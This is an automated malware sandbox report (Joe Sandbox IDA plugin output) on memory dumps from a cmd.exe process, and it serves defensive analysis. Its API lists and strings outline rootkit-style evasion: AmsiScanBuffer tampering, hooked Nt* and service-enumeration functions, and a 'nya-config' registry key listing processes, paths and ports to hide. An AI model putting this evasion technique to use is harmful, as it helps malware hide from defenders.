                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_192913e0000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                                      • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                      • API String ID: 1735320900-4225371247
                                                                      • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction ID: 8dcfc23cf0d4ca031d62e705fd7d05989bdeb59fb6d6af87bab6df0c16231e51
                                                                      • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction Fuzzy Hash: 32516BB0154A6AB6FB00EB67EC75BD42330B74674CFA1552BE41A02677DE78C25EC388

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3508256782.00000192913E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000192913E0000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3507302928.00000192913E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3509739616.00000192913F5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3510641431.0000019291400000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3511580095.0000019291402000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3512425263.0000019291409000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_192913e0000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProcSleep
                                                                      • String ID: AmsiScanBuffer$amsi.dll
                                                                      • API String ID: 188063004-3248079830
                                                                      • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction ID: 836f0419d173c4bafe70e60eb17a6274d1ecc2b3e229ab63c99ba83969ec4edd
                                                                      • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction Fuzzy Hash: 9ED06731661625F6FE086B13E8B4BD42271BBA4B09FE5043DC50F017A6DE3C89598348

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32 ref: 00000192913E3A35
                                                                      • PathFindFileNameW.SHLWAPI ref: 00000192913E3A44
                                                                        • Part of subcall function 00000192913E3F88: StrCmpNIW.SHLWAPI(?,?,?,00000192913E272F), ref: 00000192913E3FA0
                                                                        • Part of subcall function 00000192913E3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000192913E3A5B), ref: 00000192913E3EDB
                                                                        • Part of subcall function 00000192913E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000192913E3A5B), ref: 00000192913E3F0E
                                                                        • Part of subcall function 00000192913E3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000192913E3A5B), ref: 00000192913E3F2E
                                                                        • Part of subcall function 00000192913E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000192913E3A5B), ref: 00000192913E3F47
                                                                        • Part of subcall function 00000192913E3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000192913E3A5B), ref: 00000192913E3F68
                                                                      • CreateThread.KERNELBASE ref: 00000192913E3A8B
                                                                        • Part of subcall function 00000192913E1E74: GetCurrentThread.KERNEL32 ref: 00000192913E1E7F
                                                                        • Part of subcall function 00000192913E1E74: CreateThread.KERNELBASE ref: 00000192913E2043
                                                                        • Part of subcall function 00000192913E1E74: TlsAlloc.KERNEL32 ref: 00000192913E2049
                                                                        • Part of subcall function 00000192913E1E74: TlsAlloc.KERNEL32 ref: 00000192913E2055
                                                                        • Part of subcall function 00000192913E1E74: TlsAlloc.KERNEL32 ref: 00000192913E2061
                                                                        • Part of subcall function 00000192913E1E74: TlsAlloc.KERNEL32 ref: 00000192913E206D
                                                                        • Part of subcall function 00000192913E1E74: TlsAlloc.KERNEL32 ref: 00000192913E2079
                                                                        • Part of subcall function 00000192913E1E74: TlsAlloc.KERNEL32 ref: 00000192913E2085
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3508256782.00000192913E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000192913E0000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3507302928.00000192913E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3509739616.00000192913F5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3510641431.0000019291400000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3511580095.0000019291402000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3512425263.0000019291409000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_192913e0000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 2779030803-0
                                                                      • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                                      • Instruction ID: 2ae4e8f2e7df13ffbeee30f70ff522834c1a2eab6fba1a6f8eafdd0824ebd212
                                                                      • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                                      • Instruction Fuzzy Hash: 1F117131B14761B3FB609723A5797ED22B0BB9974DF70412DD406816D3EF7CC4988608

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: FileHandleType
                                                                      • String ID:
                                                                      • API String ID: 3000768030-0
                                                                      • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                                                      • Instruction ID: d5fdaa17a377098f2b254171ce871c9ac55b207a50ee97555a78d439f3c6efad
                                                                      • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                                                      • Instruction Fuzzy Hash: 2531C832A14B74A1F7748B2A95A02A93750F345BB8F740B4DDB6A973F1CB35D461C340

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3508256782.00000192913E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000192913E0000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3507302928.00000192913E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3509739616.00000192913F5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3510641431.0000019291400000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3511580095.0000019291402000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3512425263.0000019291409000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_192913e0000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: FileHandleType
                                                                      • String ID:
                                                                      • API String ID: 3000768030-0
                                                                      • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                                                      • Instruction ID: 0a93f4c1a67397024b1133c820c6a83c0bfac6788839b3a1f5b0f1ed97caa93f
                                                                      • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                                                      • Instruction Fuzzy Hash: 3331C832610B64A3FB608B2695A03A93674F345BB8F75130DDB6A073F1CB75D4A1C744
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000003.2373030928.00000192913B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000192913B0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_3_192913b0000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                      • Instruction ID: 42e15ff2f108c98b6ab8693b8e964442862811d02fb079a449669280425918a9
                                                                      • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                      • Instruction Fuzzy Hash: F4910772B411B097EB54AF2AD4107BD73B5FB54B9CF64812EDE4A0778AEA34D812C708

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00000192913E1724: GetProcessHeap.KERNEL32 ref: 00000192913E172F
                                                                        • Part of subcall function 00000192913E1724: HeapAlloc.KERNEL32 ref: 00000192913E173E
                                                                        • Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E17AE
                                                                        • Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E17DB
                                                                        • Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E17F5
                                                                        • Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E1815
                                                                        • Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E1830
                                                                        • Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E1850
                                                                        • Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E186B
                                                                        • Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E188B
                                                                        • Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E18A6
                                                                        • Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E18C6
                                                                      • SleepEx.KERNELBASE ref: 00000192913E1BDF
                                                                        • Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E18E1
                                                                        • Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E1901
                                                                        • Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E191C
                                                                        • Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E193C
                                                                        • Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E1957
                                                                        • Part of subcall function 00000192913E1724: RegOpenKeyExW.ADVAPI32 ref: 00000192913E1977
                                                                        • Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E1992
                                                                        • Part of subcall function 00000192913E1724: RegCloseKey.ADVAPI32 ref: 00000192913E199C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3508256782.00000192913E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000192913E0000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3507302928.00000192913E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3509739616.00000192913F5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3510641431.0000019291400000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3511580095.0000019291402000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3512425263.0000019291409000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_192913e0000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                      • String ID:
                                                                      • API String ID: 948135145-0
                                                                      • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                                      • Instruction ID: 3884de5eb32aa2378002382592c57e83735bdf73accb6db4f91dcf8db0c5b24e
                                                                      • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                                      • Instruction Fuzzy Hash: 2231AA75200761A3EF50AB27D9613E963B4BB48BD8F685429DE0BC77D7DE34C8A0861C

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 454 19291622ff0-19291623069 456 19291623384-192916233a7 454->456 457 1929162306f-19291623075 454->457 457->456 458 1929162307b-1929162307e 457->458 458->456 459 19291623084-19291623087 458->459 459->456 460 1929162308d-1929162309d GetModuleHandleA 459->460 461 192916230b1 460->461 462 1929162309f-192916230af GetProcAddress 460->462 463 192916230b4-192916230d2 461->463 462->463 463->456 465 192916230d8-192916230f7 StrCmpNIW 463->465 465->456 466 192916230fd-19291623101 465->466 466->456 467 19291623107-19291623111 466->467 467->456 468 19291623117-1929162311e 467->468 468->456 469 19291623124-19291623137 468->469 470 19291623139-19291623145 469->470 471 19291623147 469->471 472 1929162314a-1929162314e 470->472 471->472 473 19291623150-1929162315c 472->473 474 1929162315e 472->474 475 19291623161-1929162316b 473->475 474->475 476 19291623251-19291623255 475->476 477 19291623171-19291623174 475->477 478 19291623376-1929162337e 476->478 479 1929162325b-1929162325e 476->479 480 19291623186-19291623190 477->480 481 19291623176-19291623183 call 19291621a30 477->481 478->456 478->469 484 19291623260-1929162326c call 19291621a30 479->484 485 1929162326f-19291623279 479->485 482 192916231c4-192916231ce 480->482 483 19291623192-1929162319f 480->483 481->480 489 192916231d0-192916231dd 482->489 490 192916231fe-19291623201 482->490 483->482 488 192916231a1-192916231ae 483->488 484->485 492 192916232a9-192916232ac 485->492 493 1929162327b-19291623288 485->493 496 192916231b1-192916231b7 488->496 489->490 497 192916231df-192916231ec 489->497 499 19291623203-1929162320d call 19291621cc4 490->499 500 1929162320f-1929162321c lstrlenW 490->500 494 192916232b9-192916232c6 lstrlenW 492->494 495 192916232ae-192916232b7 call 19291621cc4 492->495 493->492 501 1929162328a-19291623297 493->501 507 192916232c8-192916232d7 call 19291621cfc 494->507 508 192916232d9-192916232e3 call 19291623f88 494->508 495->494 513 192916232ee-192916232f9 495->513 505 19291623247-1929162324c 496->505 506 192916231bd-192916231c2 496->506 509 192916231ef-192916231f5 497->509 499->500 499->505 502 1929162321e-1929162322d call 19291621cfc 500->502 503 1929162322f-19291623241 call 19291623f88 500->503 511 1929162329a-192916232a0 501->511 502->503 502->505 503->505 517 192916232e6-192916232e8 503->517 505->517 506->482 506->496 507->508 507->513 508->517 509->505 520 192916231f7-192916231fc 509->520 512 192916232a2-192916232a7 511->512 511->513 512->492 512->511 526 192916232fb-192916232ff 513->526 527 19291623370-19291623374 513->527 517->478 517->513 520->490 520->509 528 19291623307-19291623321 call 19291633a40 526->528 529 19291623301-19291623305 526->529 527->478 530 19291623324-19291623327 528->530 529->528 529->530 533 19291623329-19291623347 call 19291633a40 530->533 534 1929162334a-1929162334d 530->534 533->534 534->527 536 1929162334f-1929162336d call 19291633a40 534->536 536->527
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                                      • Instruction ID: d96a0a00f685b7fa756a5f4dcdc4f59a12f175890efc9a55aa6995d3ddb400ab
                                                                      • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                                      • Instruction Fuzzy Hash: F5B18032B116A0A2EB588F27D5247D9B3A4F749BACF64941EEE0993B96DF35CD40C340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                                      • Instruction ID: a70749b0c121d3b343f028842483e99958098e7ca8671cd8731bf1a41d9c8e71
                                                                      • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                                      • Instruction Fuzzy Hash: B9318072705B9096EB648F61E8A03EE73A4F784748F54442EDB4E47B9AEF38C649C710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction ID: baa5d399a42a167ab2690c13ccead8d5d9a8c41abd479bb163fffa3d4579f551
                                                                      • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction Fuzzy Hash: AB418F37614F9096EB64CF26E8503DE73A4F788758F600529EA9D47B9ADF38C155CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFile$FirstNext
                                                                      • String ID:
                                                                      • API String ID: 1164774033-0
                                                                      • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction ID: 7686628edc2eab42a11354a503a83483b2486879237f5beaebe73d8b8a59d018
                                                                      • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction Fuzzy Hash: E6A12832F046A069FB289B77D4643ED6BA4F74179CF344919DE99A7A9BCA38D041C700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 2135414181-3572789727
                                                                      • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction ID: fc0962bbde5761b1ea567a8fd3dfee3bc8e4d4c406f4bf45cbe51bbd31e661f8
                                                                      • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction Fuzzy Hash: 26715036B10A60A5EB109F27E8A06DC63B4FB84B8CF50551AEE5E87B2ADF39C445C340

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                                      • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                      • API String ID: 1735320900-4225371247
                                                                      • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction ID: 405dbc9284ab2ddd2e9d9d24ca6d12c6dff2f042029f2b04ef87db40eae23ac1
                                                                      • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction Fuzzy Hash: A451AC71D14A6AB5EB08EF66EC757D42320B74034CFA0491FE42A831ABDF7C825AC385

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction ID: 56fec18403e07e6bb2d7e7d3ad1ac0f90fb660efa6915ae99bfb4877351b50a2
                                                                      • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction Fuzzy Hash: 95517132A14B94A6EB24CF63E46839AB7A1F788F9DF544528DE4A47719DF3CC046C740

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                      • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                      • API String ID: 740688525-1880043860
                                                                      • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction ID: 0d35b9b9e29a5c9128642412e0d5508dc58633a7d57ed29823720d1e47a00cec
                                                                      • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction Fuzzy Hash: 6651A331B0172461FA189B5BA8207E56290BB49BB8FB80B2DDE3D873D6DF38D446C640
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
